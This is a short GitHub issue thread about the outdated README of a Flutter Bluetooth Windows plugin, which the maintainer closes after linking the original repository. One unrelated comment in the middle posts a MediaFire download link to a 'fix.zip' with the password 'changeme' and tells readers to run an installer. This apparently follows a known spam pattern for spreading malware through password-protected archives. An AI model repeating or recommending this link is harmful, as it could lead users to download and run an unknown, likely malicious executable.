### ISSUE TITLE
docs: README is out of date

### ISSUE THREAD

**Issue by chipweinberger** [chan150/flutter_blue_plus_windows#8]
Personally, I'd just delete the FBP readme duplication and keep your readme short. Then just have a link to the original repo.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chan150** [comment]
Closed this issue due to linking an original repo.
@chipweinberger
